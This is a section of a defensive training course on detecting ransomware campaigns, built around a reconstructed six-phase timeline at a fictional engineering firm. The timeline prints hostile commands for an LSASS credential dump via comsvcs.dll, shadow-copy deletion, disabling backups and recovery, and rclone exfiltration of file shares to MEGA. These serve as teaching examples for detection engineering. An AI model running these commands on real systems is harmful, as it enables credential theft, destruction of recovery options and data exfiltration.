Sign In
In this section

Documented Campaigns — Ransomware Operations

6-8 hours · Module 1 · Free
What you already know

You've seen ransomware investigations and read incident reports. You know the general sequence: access, lateral movement, encryption. This section maps the exact six-phase operational pattern with detection opportunities at each phase, a detection priority stack that tells you which signal to invest in first, and the complete campaign timeline reconstructed from real-world incident data.

Scenario

The Conti playbook leaked in 2022 showed that their average time from initial access to ransomware deployment was 5 days. Their operators followed a documented procedure: Cobalt Strike beacon, AdFind for domain enumeration, LSASS dump with comsvcs.dll, lateral movement via SMB, backup deletion, then encryption. Knowing this procedure means that when you find the AdFind execution on day 2, you know what day 5 looks like, and you have 72 hours to prevent it.

The pattern is consistent because the economics are consistent

The specific tools vary across RaaS platforms and affiliates. The discovery commands vary. The lateral movement protocol varies. The operational sequence does not, because the sequence is dictated by economic logic, not personal preference. Encrypt as much as possible, destroy recovery options, exfiltrate data for double-extortion leverage, and complete all of it before the SOC responds. Sophos reports a median of 5 days from initial access to encryption in 2025, down from 9 days in 2022. Some affiliates compress to 24 hours. CrowdStrike measured a median breakout time of 62 minutes to first lateral movement.

The consistency gives defenders a prediction tool. Once you identify the current phase, the remaining phases are predictable. The attacker must follow the economic logic. They cannot skip credential access because they need domain admin privileges to deploy ransomware via Group Policy across the domain. They cannot skip backup destruction because the victim will not pay if they can restore from backup. In 2025, backup repositories were targeted in 96% of ransomware attacks and successfully compromised in 76% of those cases. Double extortion (data theft plus encryption) is now standard at 87% of ransomware attacks, which is why data exfiltration to consumer cloud storage has become a mandatory step before encryption.

The M-Trends 2026 case involving UNC1543 and UNC2165 illustrates the speed. Roughly 70 minutes elapsed between the initial FAKEUPDATES JavaScript downloader infection (delivered by the IAB) and UNC2165's earliest interactive activity. The secondary operator destroyed backups and deployed RansomHub ransomware across Windows and virtual management servers. The entire sequence from initial infection to ransomware deployment completed within the same operational window.

The six-phase ransomware campaign

The timeline below reconstructs a complete ransomware campaign at Northgate Engineering, from broker access activation through encryption, with five detection opportunities before the final phase.

SIX PHASES — FIVE DETECTION WINDOWS BEFORE ENCRYPTION 1. ACCESS T+0 Dormant account Window 1 ◆ 2. DISCOVERY T+1hr Recon burst Window 2 ◆ 3. CREDENTIALS T+2-6hr POINT OF NO RETURN Window 3 ◆◆◆ 4. LATERAL T+6-24hr 8 systems / 17 min Window 4 ◆ 5. STAGING T+24-48hr Backups + exfil Window 5 (LAST) ◆ 6. ENCRYPTION T+48-72hr TOO LATE Contain only ← PREVENTABLE (Phases 1-5: single-endpoint to domain-wide remediation) → DAMAGE DETECTION INVESTMENT PRIORITY: Phase 3 (credential access) — highest ROI, lowest false positive rate Before Phase 3: one endpoint. After Phase 3: every domain-joined system.

Five detection windows exist before encryption. Phase 3 (credential access) is the inflection point: everything before it is single-endpoint remediation; everything after requires domain-wide response.

Timeline
RANSOMWARE CAMPAIGN — Northgate Engineering (48-72 hours)
PHASE 1 — INITIAL ACCESS (T+0)
  Mon 09:14  svc-backup@northgateeng.com authenticates via VPN
             Last sign-in: 58 days ago. IP: residential proxy.
             No MFA — service account excluded from Conditional Access.
             Detection window 1: dormant account activation.
PHASE 2 — DISCOVERY (T+1 hour)
  Mon 09:14  whoami /all
  Mon 09:14  net group "Domain Admins" /domain
  Mon 09:14  nltest /dclist:northgateeng
  Mon 09:15  net share
  Mon 09:15  systeminfo
  Mon 09:15  wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct
             Six commands in 106 seconds. Each legitimate individually.
             Detection window 2: temporal density of recon commands.
PHASE 3 — CREDENTIAL ACCESS (T+2-6 hours)
  Mon 11:30  rundll32.exe comsvcs.dll,MiniDump 672 C:\Users\Public\tmp.dmp
             LSASS memory dump via LOLBin. Domain admin credential harvested.
             Detection window 3: comsvcs.dll MiniDump — zero false positives.
             THIS IS THE POINT OF NO RETURN.
PHASE 4 — LATERAL MOVEMENT (T+6-24 hours)
  Mon 18:30  admin.lab → SRV-NGE-DC01   (domain controller)
  Mon 18:32  admin.lab → SRV-NGE-DC02   (domain controller)
  Mon 18:35  admin.lab → SRV-NGE-BKP01  (backup server)
  Mon 18:37  admin.lab → SRV-NGE-BKP02  (backup server)
  Mon 18:40  admin.lab → SRV-NGE-FS01   (file server)
  Mon 18:42  admin.lab → SRV-NGE-FS02   (file server)
  Mon 18:45  admin.lab → SRV-NGE-SQL01  (database)
  Mon 18:47  admin.lab → SRV-NGE-APP01  (application)
             Eight systems in 17 minutes. DCs first (deployment),
             then backups (disable recovery), then file servers (exfil).
             Detection window 4: lateral movement velocity.
PHASE 5 — STAGING (T+24-48 hours)
  Tue 21:30  vssadmin delete shadows /all /quiet   (backup server)
  Tue 21:30  wmic shadowcopy delete                (backup server)
  Tue 21:30  sc stop veeam                         (backup server)
  Tue 21:31  bcdedit /set recoveryenabled No       (all targets)
  Tue 21:35  rclone sync \\FS01\Finance\ mega:exfil/  (47 GB exfiltration)
             Detection window 5: shadow copy deletion + backup service stop.
             Zero false positive rate. LAST CONTAINMENT WINDOW.
PHASE 6 — ENCRYPTION (T+48-72 hours)
  Wed 22:15  GPO deploys encrypt.exe across 340 endpoints
             Encryption runs uncontested until Thursday morning.
             Detection here is damage mitigation, not prevention.

Phase analysis: where detection succeeds and fails

Phase 1 (dormant account activation) is detectable but requires a baseline of normal sign-in patterns. The detection query compares today's successful authentications against the past 60 days and flags accounts with no prior activity. The challenge is that many environments have service accounts that authenticate intermittently by design, so this detection needs tuning. The signal-to-noise ratio improves when combined with the source IP analysis (is it a known service endpoint or a residential proxy?) and the authentication protocol check (is it the expected protocol for this service account?). Service accounts authenticating via interactive logon from a residential IP address are never legitimate.

The dormant account pattern is common because IABs establish access and then go quiet while the listing sits on a marketplace. The gap between the broker's last activity and the affiliate's first activity may be weeks. Your SIEM has both events, separated by silence. The connection is visible only in retrospective analysis.

Phase 2 (discovery burst) has a high detection rate when you look for temporal density: four or more enumeration tools (whoami, net.exe, nltest, systeminfo, wmic) on the same endpoint within a five-minute window. Each individual command is legitimate. IT administrators run these daily. The discriminator is the burst pattern: six commands in 106 seconds from an account that has never run them before. The query is simple, the false positive rate is manageable with an allowlist for known admin workstations, and the detection fires within the first hour.

Phase 3 (credential access) is the highest-priority detection investment because it is the inflection point of the entire campaign. Before credential access, the attacker controls one account on one endpoint. After credential access with domain admin credentials, the attacker can deploy to every domain-joined system. The comsvcs.dll MiniDump technique targeting LSASS has a near-zero false positive rate because there is no legitimate reason for this command in production. Mimikatz, procdump targeting LSASS, and DCSync (replicating Active Directory credential data via DRSUAPI) are equally high-confidence indicators.

The detection surface for credential access is rich. Sysmon Event 10 (Process Access) with GrantedAccess values of 0x1010 or 0x1FFFFF against lsass.exe catches LSASS memory reads regardless of which tool performs them. Kerberoasting generates Event 4769 with encryption type 0x17 (RC4) for service accounts, detectable through a KQL query correlating ticket requests with non-standard encryption types. DCSync generates Event 4662 with the Replicating Directory Changes rights (GUID 1131f6aa-...), which is never requested by normal domain operations.

If you could invest in only one ransomware detection rule, target credential access. Stopping the campaign before the attacker obtains domain admin credentials limits the blast radius to a single endpoint. Stopping it after means domain-wide remediation.

Phase 4 (lateral movement velocity) produces a campaign-level signal: one account authenticating to five or more systems via network logon within a short window. The targeting pattern itself is diagnostic: domain controllers first (gaining deployment capability), then backup servers (destroying recovery options), then file servers (staging data for exfiltration). This is not how IT administrators work. Administrators authenticate to one or two servers for specific tasks.

An account touching eight servers in 17 minutes with the specific sequence of DC-backup-file is a ransomware pre-deployment pattern. The velocity is the discriminator: legitimate administrative work spreads across a workday. Ransomware lateral movement compresses into minutes because the attacker is racing against detection. Cross-referencing Phase 4 lateral movement with Phase 3 credential access (the same account that dumped LSASS is now authenticating to eight servers) produces a compound signal with the highest confidence of any ransomware detection rule.

Phase 5 (backup destruction and staging) is the last realistic containment window. Shadow copy deletion (vssadmin delete shadows), backup service termination (sc stop veeam), and recovery environment disablement (bcdedit /set recoveryenabled No) are never legitimate in production outside of documented maintenance windows. Zero false positive rate when correlated with the preceding phases. If Phase 5 fires and you have not already contained the threat from Phases 2-4, network-isolate every system the compromised account has touched. Encryption follows within hours. Data exfiltration to consumer cloud storage (MEGA, Dropbox, OneDrive for personal accounts) typically runs in parallel with backup destruction, providing the double-extortion leverage.

The detection priority stack

Analyst Decision

Priority 1 — Credential access (T+2-6h): LSASS dump, Kerberoasting, DCSync. Highest confidence, lowest false positive rate. Stops the campaign before the attacker gains domain admin. Deploy detection for comsvcs.dll MiniDump, procdump.exe targeting LSASS, and Sysmon Event 10 with GrantedAccess 0x1010 against lsass.exe.

Priority 2 — Discovery burst (T+1h): Four or more enumeration tools on the same endpoint within 5 minutes. Earliest possible signal. Higher false positive rate than credential access (IT admins run these commands legitimately), but the temporal density is the discriminator.

Priority 3 — Lateral movement velocity (T+6-24h): One account authenticating to 5 or more systems via network logon in under 30 minutes. Campaign-level signal. Combine with credential access detection for highest confidence.

Priority 4 — Backup destruction (T+24-48h): Shadow copy deletion, backup service stops, recovery disablement. Zero false positives. Last containment window. If this fires, encryption is imminent.

Priority 5 — Dormant account (T+0): Requires a 60-day baseline of normal sign-in patterns. Lowest priority because it has the highest false positive rate (intermittent service accounts) but provides the earliest possible detection if tuned correctly.

Five detection windows exist before encryption begins. If you reach Phase 6, you missed 48-72 hours of detectable activity. The priority stack tells you where to invest limited detection engineering resources for maximum impact against the most common attack pattern in the current threat landscape.

The economic argument for investing in Phases 2-3 over Phase 5 is clear. Detecting and containing at Phase 2 (discovery burst) costs one endpoint remediation. Detecting at Phase 3 (credential access) costs one endpoint plus credential rotation. Detecting at Phase 5 (backup destruction) costs domain-wide incident response, because by that point the attacker has domain admin credentials and has touched eight or more systems.

The cost of remediation increases exponentially with each phase you miss. The detection engineering investment in early phases has the highest return on investment because it reduces the remediation scope by orders of magnitude.

Detecting ransomware by detecting the ransomware binary

The SOC's primary ransomware detection is an EDR signature for known ransomware executables. The signature fires when encrypt.exe executes in Phase 6, 48-72 hours after initial access. By that point, backups are destroyed, data is exfiltrated, and encryption is deploying across 340 endpoints via GPO. The signature catches the ransomware. It does not prevent the damage. Five detection opportunities existed before the binary ever ran. Each of the preceding phases produced telemetry that was available in the SIEM and not correlated into a campaign signal.

Offensive Operations Principle

Ransomware campaigns follow a predictable six-phase sequence because the economic logic is consistent: gain access, harvest credentials, move laterally, destroy backups, exfiltrate, encrypt. Five detection windows exist before encryption begins. Credential access (Phase 3) is the highest-priority detection investment because it is the point of no return. Everything before Phase 3 is recoverable with a single endpoint remediation. Everything after requires domain-wide response.

Next
Section 1.11: Documented Campaigns — Espionage and Supply Chain. The same operational framework applied to campaigns with intelligence and access objectives. Longer timelines, quieter operations, and detection challenges that require completely different approaches from ransomware detection.
© 2026 Ridgeline Cyber Defence™ Ltd. Content may not be reproduced or redistributed. Worked artifacts may be adapted for use within your organization.
Unlock the Full Course See Full Course Agenda
← Previous Next →